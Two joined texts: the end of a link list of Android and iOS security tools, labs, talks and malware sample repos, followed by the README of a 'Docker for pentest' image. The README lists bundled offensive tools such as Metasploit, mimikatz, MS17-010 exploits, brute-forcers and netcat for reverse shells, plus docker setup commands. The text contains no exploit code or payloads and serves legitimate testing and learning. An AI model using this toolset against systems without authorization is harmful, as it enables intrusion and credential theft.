* [Droid Hunter – Android application vulnerability analysis and Android pentest tool](https://github.com/hahwul/droid-hunter)
* [Error Prone – Static Analysis Tool](https://github.com/google/error-prone)
* [Findbugs – Find Bugs in Java Programs](http://findbugs.sourceforge.net/downloads.html)
* [Find Security Bugs – A SpotBugs plugin for security audits of Java web applications.](https://github.com/find-sec-bugs/find-sec-bugs/)
* [Flow Droid – Static Data Flow Tracker](https://github.com/secure-software-engineering/FlowDroid)
* [Smali/Baksmali – Assembler/Disassembler for the dex format](https://github.com/JesusFreke/smali)
* [Smali-CFGs – Smali Control Flow Graph’s](https://github.com/EugenioDelfa/Smali-CFGs)
* [SPARTA – Static Program Analysis for Reliable Trusted Apps](https://www.cs.washington.edu/sparta)
* [Thresher – To check heap reachability properties](https://plv.colorado.edu/projects/thresher/)
* [Vector Attack Scanner – To search vulnerable points to attack](https://github.com/Sukelluskello/VectorAttackScanner)
* [Gradle Static Analysis Plugin](https://github.com/novoda/gradle-static-analysis-plugin)
* [Checkstyle – A tool for checking Java source code](https://github.com/checkstyle/checkstyle)
* [PMD – An extensible multilanguage static code analyzer](https://github.com/pmd/pmd)
* [Soot – A Java Optimization Framework](https://github.com/Sable/soot)
* [Android Quality Starter](https://github.com/pwittchen/android-quality-starter)
* [QARK – Quick Android Review Kit](https://github.com/linkedin/qark)
* [Infer – A Static Analysis tool for Java, C, C++ and Objective-C](https://github.com/facebook/infer)
* [Android Check – Static Code analysis plugin for Android Project](https://github.com/noveogroup/android-check)
* [FindBugs-IDEA Static byte code analysis to look for bugs in Java code](https://plugins.jetbrains.com/plugin/3847-findbugs-idea)
* [APK Leaks – Scanning APK file for URIs, endpoints & secrets](https://github.com/dwisiswant0/apkleaks)
#### Dynamic Analysis
* [Adhrit - Android Security Suite for in-depth reconnaissance and static bytecode analysis based on Ghera benchmarks](https://github.com/abhi-r3v0/Adhrit)
* [Android Hooker - Opensource project for dynamic analyses of Android applications](https://github.com/AndroidHooker/hooker)
* [AppAudit - Online tool ( including an API) uses dynamic and static analysis](http://appaudit.io/)
* [AppAudit - A bare-metal analysis tool on Android devices](https://github.com/ucsb-seclab/baredroid)
* [CuckooDroid - Extension of Cuckoo Sandbox the Open Source software](https://github.com/idanr1986/cuckoo-droid)
* [DroidBox - Dynamic analysis of Android applications](https://code.google.com/p/droidbox/)
* [Droid-FF - Android File Fuzzing Framework](https://github.com/antojoseph/droid-ff)
* [Drozer](https://www.mwrinfosecurity.com/products/drozer/)
* [Marvin - Analyzes Android applications and allows tracking of an app](https://github.com/programa-stic/marvin-django)
* [Inspeckage](https://github.com/ac-pm/Inspeckage)
* [PATDroid - Collection of tools and data structures for analyzing Android applications](https://github.com/mingyuan-xia/PATDroid)
* [AndroL4b - Android security virtual machine based on ubuntu-mate](https://github.com/sh4hin/Androl4b)
* [Radare2 - Unix-like reverse engineering framework and commandline tools](https://github.com/radareorg/radare2)
* [Cutter - Free and Open Source RE Platform powered by radare2](https://cutter.re/)
* [ByteCodeViewer - Android APK Reverse Engineering Suite (Decompiler, Editor, Debugger)](https://bytecodeviewer.com/)
* [Mobile-Security-Framework MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
* [CobraDroid - Custom build of the Android operating system geared specifically for application security ](https://thecobraden.com/projects/cobradroid/)
* [Magisk v20.2 - Root & Universal Systemless Interface](https://forum.xda-developers.com/apps/magisk/official-magisk-v7-universal-systemless-t3473445)
* [Runtime Mobile Security (RMS) - is a powerful web interface that helps you to manipulate Android and iOS Apps at Runtime](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
* [MOBEXLER - A Mobile Application Penetration Testing Platform](https://mobexler.com/)
#### Android Online APK Analyzers
* [Oversecured](https://oversecured.com/) - A static vulnerability scanner for Android apps (APK files) containing 90+ vulnerability categories
* [Android Observatory APK Scan](https://androidobservatory.org/upload)
* [Android APK Decompiler](http://www.decompileandroid.com/)
* [AndroTotal](http://andrototal.org/)
* [NVISO ApkScan](https://apkscan.nviso.be/)
* [VirusTotal](https://www.virustotal.com/#/home/upload)
* [Scan Your APK](https://scanyourapk.com/)
* [AVC Undroid](https://undroid.av-comparatives.org/index.php)
* [OPSWAT](https://metadefender.opswat.com/#!/)
* [ImmuniWeb Mobile App Scanner](https://www.htbridge.com/mobile/)
* [Ostor Lab](https://www.ostorlab.co/scan/mobile/)
* [Quixxi](https://quixxisecurity.com/)
* [TraceDroid](http://tracedroid.few.vu.nl/submit.php)
* [Visual Threat](http://www.visualthreat.com/UIupload.action)
* [App Critique](https://appcritique.boozallen.com/)
### Labs
* [OVAA (Oversecured Vulnerable Android App)](https://github.com/oversecured/ovaa)
* [DIVA (Damn insecure and vulnerable App)](https://github.com/payatu/diva-android)
* [SecurityShepherd](https://github.com/OWASP/SecurityShepherd)
* [Damn Vulnerable Hybrid Mobile App (DVHMA)](https://github.com/logicalhacking/DVHMA)
* [OWASP-mstg](https://github.com/OWASP/owasp-mstg/tree/master/Crackmes)
* [VulnerableAndroidAppOracle](https://github.com/dan7800/VulnerableAndroidAppOracle)
* [Android InsecureBankv2](https://github.com/dineshshetty/Android-InsecureBankv2)
* [Purposefully Insecure and Vulnerable Android Application (PIIVA)](https://github.com/htbridge/pivaa)
* [Sieve app](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk)
* [DodoVulnerableBank](https://github.com/CSPF-Founder/DodoVulnerableBank)
* [Digitalbank](https://github.com/CyberScions/Digitalbank)
* [OWASP GoatDroid](https://github.com/jackMannino/OWASP-GoatDroid-Project)
* [AppKnox Vulnerable Application](https://github.com/appknox/vulnerable-application)
* [Vulnerable Android Application](https://github.com/Lance0312/VulnApp)
* [MoshZuk](https://dl.dropboxusercontent.com/u/37776965/Work/MoshZuk.apk)
* [Hackme Bank](http://www.mcafee.com/us/downloads/free-tools/hacme-bank-android.aspx)
* [Android Security Labs](https://github.com/SecurityCompass/AndroidLabs)
* [Android-InsecureBankv2](https://github.com/dineshshetty/Android-InsecureBankv2)
* [Android-security](https://github.com/rafaeltoledo/android-security)
* [VulnDroid](https://github.com/shahenshah99/VulnDroid)
* [FridaLab](https://rossmarks.uk/blog/fridalab/)
* [Santoku Linux - Mobile Security VM](https://santoku-linux.com/)
* [Vuldroid](https://github.com/jaiswalakshansh/Vuldroid)
### Talks
* [Blowing the Cover of Android Binary Fuzzing (Slides)](https://speakerdeck.com/flankerhqd/blowing-the-cover-of-android-binary-fuzzing)
* [One Step Ahead of Cheaters -- Instrumenting Android Emulators](https://www.youtube.com/watch?v=L3AniAxp_G4)
* [Vulnerable Out of the Box: An Evaluation of Android Carrier Devices](https://www.youtube.com/watch?v=R2brQvQeTvM)
* [Rock appround the clock: Tracking malware developers by Android](https://www.youtube.com/watch?v=wd5OU9NvxjU)
* [Chaosdata - Ghost in the Droid: Possessing Android Applications with ParaSpectre](https://www.youtube.com/watch?v=ohjTWylMGEA)
* [Remotely Compromising Android and iOS via a Bug in Broadcom's Wi-Fi Chipsets](https://www.youtube.com/watch?v=TDk2RId8LFo)
* [Honey, I Shrunk the Attack Surface – Adventures in Android Security Hardening](https://www.youtube.com/watch?v=EkL1sDMXRVk)
* [Hide Android Applications in Images](https://www.youtube.com/watch?v=hajOlvLhYJY)
* [Scary Code in the Heart of Android](https://www.youtube.com/watch?v=71YP65UANP0)
* [Fuzzing Android: A Recipe For Uncovering Vulnerabilities Inside System Components In Android](https://www.youtube.com/watch?v=q_HibdrbIxo)
* [Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Native Library](https://www.youtube.com/watch?v=s0Tqi7fuOSU)
* [Android FakeID Vulnerability Walkthrough](https://www.youtube.com/watch?v=5eJYCucZ-Tc)
* [Unleashing D* on Android Kernel Drivers](https://www.youtube.com/watch?v=1XavjjmfZAY)
* [The Smarts Behind Hacking Dumb Devices](https://www.youtube.com/watch?v=yU1BrY1ZB2o)
* [Overview of common Android app vulnerabilities](https://www.bugcrowd.com/resources/webinars/overview-of-common-android-app-vulnerabilities/)
* [Android Dev Summit 2019](https://developer.android.com/dev-summit)
* [Android security architecture](https://www.youtube.com/watch?v=3asW-nBU-JU)
* [Get the Ultimate Privilege of Android Phone](https://vimeo.com/335948808)
### Misc.
* [Android-Reports-and-Resources](https://github.com/B3nac/Android-Reports-and-Resources/blob/master/README.md)
* [android-security-awesome](https://github.com/ashishb/android-security-awesome)
* [Android Penetration Testing Courses](https://medium.com/mobile-penetration-testing/android-penetration-testing-courses-4effa36ac5ed)
* [Lesser-known Tools for Android Application PenTesting](https://captmeelo.com/pentest/2019/12/30/lesser-known-tools-for-android-pentest.html)
* [android-device-check - a set of scripts to check Android device security configuration](https://github.com/nelenkov/android-device-check)
* [apk-mitm - a CLI application that prepares Android APK files for HTTPS inspection](https://github.com/shroudedcode/apk-mitm)
* [Andriller - is software utility with a collection of forensic tools for smartphones](https://github.com/den4uk/andriller)
* [Dexofuzzy: Android malware similarity clustering method using opcode sequence-Paper](https://www.virusbulletin.com/virusbulletin/2019/11/dexofuzzy-android-malware-similarity-clustering-method-using-opcode-sequence/)
* [Chasing the Joker](https://docs.google.com/presentation/d/1sFGAERaNRuEORaH06MmZKeFRqpJo1ol1xFieUa1X_OA/edit#slide=id.p1)
* [Side Channel Attacks in 4G and 5G Cellular Networks-Slides](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf)
* [Shodan.io-mobile-app for Android](https://github.com/PaulSec/Shodan.io-mobile-app)
* [Popular Android Malware 2018](https://github.com/sk3ptre/AndroidMalware_2018)
* [Popular Android Malware 2019](https://github.com/sk3ptre/AndroidMalware_2019)
* [Popular Android Malware 2020](https://github.com/sk3ptre/AndroidMalware_2020)
## iOS
### General - Blogs, Papers, How to's
* [iOS Security](https://www.cse.wustl.edu/~jain/cse571-14/ftp/ios_security/index.html)
* [Basic iOS Apps Security Testing lab](https://medium.com/@ehsahil/basic-ios-apps-security-testing-lab-1-2bf37c2a7d15)
* [IOS Application security – Setting up a mobile pentesting platform](https://resources.infosecinstitute.com/ios-application-security-part-1-setting-up-a-mobile-pentesting-platform/#gref)
* [Collection of the most common vulnerabilities found in iOS applications](https://github.com/felixgr/secure-ios-app-dev)
* [IOS_Application_Security_Testing_Cheat_Sheet](https://www.owasp.org/index.php/IOS_Application_Security_Testing_Cheat_Sheet)
* [OWASP iOS Basic Security Testing](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06b-basic-security-testing)
* [Dynamic analysis of iOS apps w/o Jailbreak](https://medium.com/@ansjdnakjdnajkd/dynamic-analysis-of-ios-apps-wo-jailbreak-1481ab3020d8)
* [iOS Application Injection](https://arjunbrar.com/post/ios-application-injection)
* [Low-Hanging Apples: Hunting Credentials and Secrets in iOS Apps](https://spaceraccoon.dev/low-hanging-apples-hunting-credentials-and-secrets-in-ios-apps)
* [Checkra1n Era - series](https://blog.digital-forensics.it/)
* [BFU Extraction: Forensic Analysis of Locked and Disabled iPhones](https://blog.elcomsoft.com/2019/12/bfu-extraction-forensic-analysis-of-locked-and-disabled-iphones/)
* [HowTo-decrypt-Signal.sqlite-for-IOS](https://github.com/Magpol/HowTo-decrypt-Signal.sqlite-for-IOS)
* [Can I Jailbreak?](https://canijailbreak.com/)
* [How to Extract Screen Time Passcodes and Voice Memos from iCloud](https://blog.elcomsoft.com/2019/10/how-to-extract-screen-time-passcodes-and-voice-memos-from-icloud/)
* [Reverse Engineering Swift Apps](https://github.com/iOS-Reverse-Engineering-Dev/Swift-Apps-Reverse-Engineering/blob/master/Reverse%20Engineering%20Swift%20Applications.pdf)
* [Mettle your iOS with FRIDA](https://sensepost.com/blog/2019/mettle-your-ios-with-frida/)
* [A run-time approach for pentesting iOS applications](https://blog.securelayer7.net/a-run-time-approach-for-pen-testing-ios-applications-part-ii-objection-in-action/)
* [iOS Internals vol 2](http://newosxbook.com/bonus/iBoot.pdf)
* [Understanding usbmux and the iOS lockdown service](https://medium.com/@jon.gabilondo.angulo_7635/understanding-usbmux-and-the-ios-lockdown-service-7f2a1dfd07ae)
* [A Deep Dive into iOS Code Signing](https://blog.umangis.me/a-deep-dive-into-ios-code-signing/)
* [AirDoS: remotely render any nearby iPhone or iPad unusable](https://kishanbagaria.com/airdos/)
* [How to access and traverse a #checkra1n jailbroken iPhone File system using SSH](https://aboutdfir.com/jailbreaking-checkra1n-configuration/)
* [Deep dive into iOS Exploit chains found in the wild - Project Zero](https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html)
* [The Fully Remote Attack Surface of the iPhone - Project Zero](https://googleprojectzero.blogspot.com/2019/08/the-fully-remote-attack-surface-of.html)
### Books
* [Hacking and Securing iOS Applications: Stealing Data, Hijacking Software, and How to Prevent It](https://www.amazon.com/Hacking-Securing-iOS-Applications-Hijacking/dp/1449318746)
* [iOS Penetration Testing](https://www.apress.com/gp/book/9781484223543)
* [iOS App Security, Penetration Testing, and Development](https://www.allysonomalley.com/)
* [IOS Hacker's Handbook](https://www.amazon.com/iOS-Hackers-Handbook-Charlie-Miller/dp/1118204123)
* [Hacking iOS Applications a detailed testing guide](https://web.securityinnovation.com/hubfs/iOS%20Hacking%20Guide.pdf)
* [Develop iOS Apps (Swift)](https://developer.apple.com/library/archive/referencelibrary/GettingStarted/DevelopiOSAppsSwift/)
* [iOS Programming Cookbook](https://www.packtpub.com/in/application-development/ios-programming-cookbook)
### Courses
* [Pentesting iOS Applications](https://www.pentesteracademy.com/course?id=2)
* [Reverse Engineering iOS Applications](https://github.com/ivRodriguezCA/RE-iOS-Apps)
* [App Design and Development for iOS](https://www.coursera.org/learn/ios-app-design-development)
### Tools
* [Cydia Impactor](http://www.cydiaimpactor.com/)
* [checkra1n jailbreak](https://checkra.in/)
* [idb - iOS App Security Assessment Tool](https://www.idbtool.com/)
* [Frida](https://github.com/frida/frida/releases)
* [Objection - mobile exploration toolkit by Frida](https://github.com/sensepost/objection)
* [Bfinject](https://github.com/BishopFox/bfinject)
* [iFunbox](http://www.i-funbox.com/)
* [Libimobiledevice - library to communicate with the services of the Apple ios devices](https://www.libimobiledevice.org/)
* [iRET (iOS Reverse Engineering Toolkit)](https://www.veracode.com/sites/default/files/Resources/Tools/iRETTool.zip) - includes oTool, dumpDecrypted, SQLite, Theos, Keychain_dumper, Plutil
* [Myriam iOS](https://github.com/GeoSn0w/Myriam)
* [iWep Pro - wireless suite of useful applications used to turn your iOS device into a wireless network diagnostic tool](https://itunes.apple.com/us/app/iweppro/id578135585?mt=8)
* [Burp Suite](https://portswigger.net/burp/communitydownload)
* [Cycript](https://cydia.saurik.com/api/latest/3)
* [needle - The iOS Security Testing Framework](https://github.com/FSecureLABS/needle)
* [iLEAPP - iOS Logs, Events, And Preferences Parser](https://github.com/abrignoni/iLEAPP)
* [Cutter - Free and Open Source RE Platform powered by radare2](https://cutter.re/)
* [decrypt0r - automatically download and decrypt SecureRom stuff](https://github.com/shinvou/decrypt0r)
* [iOS Security Suite - an advanced and easy-to-use platform security & anti-tampering library](https://github.com/securing/IOSSecuritySuite)
### Labs
* [OWASP iGoat](https://www.owasp.org/index.php/OWASP_iGoat_Tool_Project)
* [Damn Vulnerable iOS App (DVIA) v2](https://github.com/prateek147/DVIA-v2)
* [Damn Vulnerable iOS App (DVIA) v1](https://github.com/prateek147/DVIA)
* [iPhoneLabs](https://github.com/SecurityCompass/iPhoneLabs)
* [iOS-Attack-Defense](https://github.com/ManicodeSecurity/iOS-Attack-Defense)
### Talks
* [Behind the Scenes of iOS Security](https://www.youtube.com/watch?v=BLGFriOKz6U)
* [Modern iOS Application Security](https://www.infoq.com/presentations/ios-security/)
* [Demystifying the Secure Enclave Processor](https://www.youtube.com/watch?v=7UNeUT_sRos)
* [HackPac Hacking Pointer Authentication in iOS User Space](https://www.youtube.com/watch?v=DJFxhShJ6Ns)
* [Analyzing and Attacking Apple Kernel Drivers](https://www.youtube.com/watch?v=07VqX4bbXTI)
* [Remotely Compromising iOS via Wi-Fi and Escaping the Sandbox](https://www.youtube.com/watch?v=bP5VP7vLLKo)
* [Reverse Engineering iOS Mobile Apps](https://www.bugcrowd.com/resources/webinars/reverse-engineering-ios-mobile-apps/)
* [iOS 10 Kernel Heap Revisited](https://www.youtube.com/watch?v=DNW6Im31lQo)
* [KTRW: The journey to build a debuggable iPhone](https://media.ccc.de/v/36c3-10806-ktrw_the_journey_to_build_a_debuggable_iphone)
* [The One Weird Trick SecureROM Hates](https://media.ccc.de/v/36c3-11238-the_one_weird_trick_securerom_hates)
* [Tales of old: untethering iOS 11-Spoiler: Apple is bad at patching](https://media.ccc.de/v/36c3-11034-tales_of_old_untethering_ios_11)
* [Messenger Hacking: Remotely Compromising an iPhone through iMessage](https://media.ccc.de/v/36c3-10497-messenger_hacking_remotely_compromising_an_iphone_through_imessage)
* [Recreating An iOS 0-Day Jailbreak Out Of Apple's Security Updates](https://www.youtube.com/watch?v=p512McKXukU)
* [Reverse Engineering the iOS Simulator’s SpringBoard](https://vimeo.com/231806976)
* [Attacking iPhone XS Max](https://www.youtube.com/watch?v=8cOx7vfszZU&feature=youtu.be)
### Misc.
* [Most usable tools for iOS penetration testing](https://github.com/ansjdnakjdnajkd/iOS)
* [iOS-Security-Guides](https://github.com/0xmachos/iOS-Security-Guides)
* [osx-security-awesome - OSX and iOS related security tools](https://github.com/ashishb/osx-and-ios-security-awesome)
* [Trust in Apple's Secret Garden: Exploring & Reversing Apple's Continuity Protocol-Slides](https://i.blackhat.com/eu-19/Thursday/eu-19-Yen-Trust-In-Apples-Secret-Garden-Exploring-Reversing-Apples-Continuity-Protocol-3.pdf)
* [Apple Platform Security](https://manuals.info.apple.com/MANUALS/1000/MA1902/en_US/apple-platform-security-guide.pdf)
* [Mobile security, forensics & malware analysis with Santoku Linux](https://2013.appsecusa.org/2013/wp-content/uploads/2013/12/viaForensics-AppSecUSA-Nov-2013.pdf)
|
<!-- markdownlint-disable MD033 MD041 -->
<p align="center">
<a href="https://hub.docker.com/r/aaaguirrep/pentest">
<img
alt="Docker for pentest"
src="img/banner.jpg"
width="600"
/>
</a>
</p>
<br/>
<p align="center">
<a href="https://github.com/aaaguirrep/pentest"><img alt="GitHub code size in bytes" src="https://img.shields.io/github/languages/code-size/aaaguirrep/pentest"></a>
<a href="https://github.com/aaaguirrep/pentest"><img alt="GitHub repo size" src="https://img.shields.io/github/repo-size/aaaguirrep/pentest"></a>
<a href="https://github.com/aaaguirrep/pentest"><img alt="GitHub last commit" src="https://img.shields.io/github/last-commit/aaaguirrep/pentest"></a>
<a href="https://github.com/aaaguirrep/pentest"><img alt="GitHub issues" src="https://img.shields.io/github/issues/aaaguirrep/pentest"></a>
<a href="https://hub.docker.com/r/aaaguirrep/pentest"><img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/aaaguirrep/pentest"></a>
<a href="https://hub.docker.com/r/aaaguirrep/pentest"><img alt="Docker Automated build" src="https://img.shields.io/docker/automated/aaaguirrep/pentest"></a>
<a href="https://hub.docker.com/r/aaaguirrep/pentest"><img alt="Docker Pulls" src="https://img.shields.io/docker/pulls/aaaguirrep/pentest"></a>
<a href="https://hub.docker.com/r/aaaguirrep/pentest"><img alt="Docker Image Size (latest by date)" src="https://img.shields.io/docker/image-size/aaaguirrep/pentest"></a>
<a href="https://hub.docker.com/r/aaaguirrep/pentest"><img alt="Docker Image Version (latest by date)" src="https://img.shields.io/docker/v/aaaguirrep/pentest"></a>
<a href="https://hub.docker.com/r/aaaguirrep/pentest"><img alt="Docker Stars" src="https://img.shields.io/docker/stars/aaaguirrep/pentest"></a>
<a href="https://github.com/aaaguirrep/pentest/blob/master/LICENSE"><img alt="GitHub" src="https://img.shields.io/github/license/aaaguirrep/pentest"></a>
</p>
Docker for pentest is an image with the more used tools to create an pentest environment easily and quickly.
:arrow_right: **Note:** Check out the next repo to know how to launch the docker for pentest in a VPS in Google Cloud Platform or Digital Ocean. [VPS for docker for pentest](https://github.com/aaaguirrep/vps-docker-for-pentest)
### Table of Contents
- [Features](#features)
- [Requirements](#requirements)
- [Tools installed](#tools-installed)
- [Operative system tools](#operative-system-tools)
- [Network tools](#network-tools)
- [Developer tools](#developer-tools)
- [:hocho: Pentest tools](#hocho-pentest-tools)
- [Port scanning](#port-scanning)
- [:mag: Recon](#mag-recon)
- [Subdomains](#subdomains)
- [Subdomain takeover](#subdomain-takeover)
- [DNS Lookups](#dns-lookups)
- [:camera: Screenshot](#camera-screenshot)
- [:spider_web: Crawler](#spider_web-crawler)
- [:file_folder: Search directories](#file_folder-search-directories)
- [Fuzzer](#fuzzer)
- [Web Scanning](#web-scanning)
- [CMS](#cms)
- [Search JS](#search-js)
- [Wordlist](#wordlist)
- [Git repositories](#git-repositories)
- [OWASP](#owasp)
- [:iphone: Mobile](#iphone-mobile)
- [Brute force](#brute-force)
- [Cracking](#cracking)
- [OS Enumeration](#os-enumeration)
- [Exploits](#exploits)
- [Windows](#windows)
- [Reverse shell](#reverse-shell)
- [Other resources](#other-resources)
- [Custom functions](#custom-functions)
- [Other services](#other-services)
- [:memo: Documentation](#memo-documentation)
- [:hammer_and_wrench: Usage](#hammer_and_wrench-usage)
- [Option 1 - Use the github repository](#option-1---use-the-github-repository)
- [Option 2 - Use the image from docker hub](#option-2---use-the-image-from-docker-hub)
- [Considerations to run the container](#considerations-to-run-the-container)
- [:gear: Nice configurations](#gear-nice-configurations)
- [1. Configure credentials in the docker](#1-configure-credentials-in-the-docker)
- [2. Alias to connect to HTB (Hack the Box) VPN](#2-alias-to-connect-to-htb-hack-the-box-vpn)
- [Option 1 - HTB VPN using github repository](#option-1---htb-vpn-using-github-repository)
- [Option 2 - HTB VPN using docker hub image](#option-2---htb-vpn-using-docker-hub-image)
- [3. Save and load command history in your local environment](#3-save-and-load-command-history-in-your-local-environment)
- [Option 1 - Command history using github repository](#option-1---command-history-using-github-repository)
- [Option 2 - Command history using docker hub image](#option-2---command-history-using-docker-hub-image)
- [:white_check_mark: Environment tested](#white_check_mark-environment-tested)
- [:warning: Warning](#warning-warning)
- [:coffee: Donations](#coffee-donations)
- [Contributing](#contributing)
- [:chart_with_upwards_trend: Stargazers over time](#chart_with_upwards_trend-stargazers-over-time)
- [License](#license)
## Features
- OS, networking, developing and pentesting tools installed.
- Connection to HTB (Hack the Box) vpn to access HTB machines.
- Popular wordlists installed: SecLists, dirb, dirbuster, fuzzdb, wfuzz and rockyou.
- Proxy service to send traffic from any browsers and burp suite installed in your local directory.
- Exploit database installed.
- Tool for cracking password.
- Linux enumeration tools installed.
- Tools installed to discovery services running.
- Tools installed to directory fuzzing.
- Monitor for linux processes without root permissions
- Zsh shell installed.
## Requirements
- Docker service installed
## Tools installed
### Operative system tools
- rdate
- vim
- zsh
- oh-my-zsh
- locate
- cifs-utils
- htop
- [gotop](https://github.com/cjbassi/gotop)
### Network tools
- traceroute
- telnet
- net-tools
- iputils-ping
- tcpdump
- openvpn
- whois
- host
- prips
- dig
### Developer tools
- git
- curl
- wget
- ruby
- go
- python
- python-pip
- python3
- python3-pip
- php
- aws-cli
- [tojson](https://github.com/tomnomnom/hacks/tree/master/tojson)
- nodejs
### :hocho: Pentest tools
#### Port scanning
- [nmap](https://github.com/nmap/nmap)
- [masscan](https://github.com/robertdavidgraham/masscan)
- [ScanPorts](https://github.com/aaaguirrep/scanPorts) created by [@s4vitar](https://github.com/s4vitar) with some improvements
#### :mag: Recon
##### Subdomains
- [Amass](https://github.com/OWASP/Amass)
- [GoBuster](https://github.com/OJ/gobuster)
- [Knock](https://github.com/guelfoweb/knock)
- [MassDNS](https://github.com/blechschmidt/massdns)
- [Altdns](https://github.com/infosec-au/altdns)
- [spyse](https://github.com/zeropwn/spyse.py)
- [Sublist3r](https://github.com/aboul3la/Sublist3r)
- [findomain](https://github.com/Edu4rdSHL/findomain)
- [subfinder](https://github.com/projectdiscovery/subfinder)
- [spiderfoot](https://github.com/smicallef/spiderfoot)
- [haktldextract](https://github.com/hakluke/haktldextract)
##### Subdomain takeover
- [subjack](https://github.com/haccer/subjack)
- [SubOver](https://github.com/Ice3man543/SubOver)
- [tko-subs](https://github.com/anshumanbh/tko-subs)
##### DNS Lookups
- [hakrevdns](https://github.com/hakluke/hakrevdns)
##### :camera: Screenshot
- [gowitness](https://github.com/sensepost/gowitness)
- [aquatone](https://github.com/michenriksen/aquatone)
##### :spider_web: Crawler
- [hakrawler](https://github.com/hakluke/hakrawler)
- [Photon](https://github.com/s0md3v/Photon)
- [gospider](https://github.com/jaeles-project/gospider)
- [gau](https://github.com/lc/gau)
- [otxurls](https://github.com/lc/otxurls)
- [waybackurls](https://github.com/tomnomnom/waybackurls)
##### :file_folder: Search directories
- [dirsearch](https://github.com/maurosoria/dirsearch)
##### Fuzzer
- [wfuzz](https://github.com/xmendez/wfuzz)
- [ffuf](https://github.com/ffuf/ffuf)
##### Web Scanning
- [whatweb](https://github.com/urbanadventurer/WhatWeb)
- [wafw00z](https://github.com/EnableSecurity/wafw00f)
- [nikto](https://github.com/sullo/nikto)
- [arjun](https://github.com/s0md3v/Arjun)
- [httprobe](https://github.com/tomnomnom/httprobe)
- [striker](https://github.com/s0md3v/Striker)
- [hakcheckurl](https://github.com/hakluke/hakcheckurl)
- [httpx](https://github.com/projectdiscovery/httpx)
##### CMS
- [wpscan](https://github.com/wpscanteam/wpscan)
- [joomscan](https://github.com/rezasp/joomscan)
- [droopescan](https://github.com/droope/droopescan)
- [cmseek](https://github.com/Tuhinshubhra/CMSeeK)
##### Search JS
- [LinkFinder](https://github.com/GerbenJavado/LinkFinder)
- [getJS](https://github.com/003random/getJS)
- [subjs](https://github.com/lc/subjs)
#### Wordlist
- [cewl](https://github.com/digininja/CeWL)
- wordlists:
- [wfuzz](https://github.com/xmendez/wfuzz)
- [SecList](https://github.com/danielmiessler/SecLists)
- [Fuzzdb](https://github.com/fuzzdb-project/fuzzdb)
- [Dirbuster](https://github.com/daviddias/node-dirbuster)
- [Dirb](https://github.com/v0re/dirb)
- [Rockyou](https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt)
- [all.txt](https://gist.github.com/jhaddix/f64c97d0863a78454e44c2f7119c2a6a)
- crunch
#### Git repositories
- [gitleaks](https://github.com/zricethezav/gitleaks)
- [gitrob](https://github.com/michenriksen/gitrob)
- [gitGraber](https://github.com/hisxo/gitGraber)
- [github-search](https://github.com/gwen001/github-search)
- [GitTools](https://github.com/internetwache/GitTools)
#### OWASP
- [sqlmap](https://github.com/sqlmapproject/sqlmap)
- [XSStrike](https://github.com/s0md3v/XSStrike)
- [kxss](https://github.com/tomnomnom/hacks/tree/master/kxss)
- [dalfox](https://github.com/hahwul/dalfox)
- [jwt_tool](https://github.com/ticarpi/jwt_tool)
#### :iphone: Mobile
- [apktool](https://ibotpeaches.github.io/Apktool/)
#### Brute force
- [crowbar](https://github.com/galkan/crowbar)
- [hydra](https://github.com/vanhauser-thc/thc-hydra)
- [patator](https://github.com/lanjelot/patator)
- medusa
#### Cracking
- [hashid](https://github.com/psypanda/hashID)
- [john the ripper](https://github.com/magnumripper/JohnTheRipper)
- [hashcat](https://github.com/hashcat/hashcat)
#### OS Enumeration
- [htbenum](https://github.com/SolomonSklash/htbenum)
- [linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration)
- [linenum](https://github.com/rebootuser/LinEnum)
- [enum4linux](https://github.com/portcullislabs/enum4linux)
- [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
- [PEASS - Privilege Escalation Awesome Scripts SUITE](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
- [Windows Exploit Suggester - Next Generation](https://github.com/bitsadmin/wesng)
- [smbmap](https://github.com/ShawnDEvans/smbmap)
- [pspy - unprivileged Linux process snooping](https://github.com/DominicBreuker/pspy)
- smbclient
- ftp
#### Exploits
- [searchsploit](https://github.com/offensive-security/exploitdb)
- [Metasploit](https://github.com/rapid7/metasploit-framework)
- [MS17-010](https://github.com/worawit/MS17-010)
- [AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010)
- [PrivExchange](https://github.com/dirkjanm/PrivExchange)
#### Windows
- [evil-winrm](https://github.com/Hackplayers/evil-winrm)
- [impacket](https://github.com/SecureAuthCorp/impacket)
- [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
- [Nishang](https://github.com/samratashok/nishang)
- [Juicy Potato](https://github.com/ohpe/juicy-potato)
- [PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
- [pass-the-hash](https://github.com/byt3bl33d3r/pth-toolkit)
- [mimikatz](https://github.com/gentilkiwi/mimikatz)
- gpp-decrypt
#### Reverse shell
- [netcat](https://github.com/diegocr/netcat)
- [rlwrap](https://github.com/hanslub42/rlwrap)
#### Other resources
- [pentest-tools](https://github.com/gwen001/pentest-tools) from [@gwen001](https://github.com/gwen001)
- [qsreplace](https://github.com/tomnomnom/qsreplace) from [@tomnomnom](https://github.com/tomnomnom)
### Custom functions
- NmapExtractPorts from [@s4vitar](https://github.com/s4vitar)
### Other services
- apache2
- squid
## :memo: Documentation
See the project's [wiki](https://github.com/aaaguirrep/pentest/wiki) for documentation.
## :hammer_and_wrench: Usage
You can use the docker image by the next two options:
### Option 1 - Use the github repository
git clone --depth 1 https://github.com/aaaguirrep/pentest.git
cd pentest
docker build -t pentest .
docker run --rm -it --name my-pentest pentest /bin/zsh
### Option 2 - Use the image from docker hub
Use image from docker hub: [aaaguirrep/pentest](https://hub.docker.com/r/aaaguirrep/pentest)
docker pull aaaguirrep/pentest
docker run --rm -it --name my-pentest pentest /bin/zsh
### Considerations to run the container
There are differents use cases for use the image and you should know how to run the container properly.
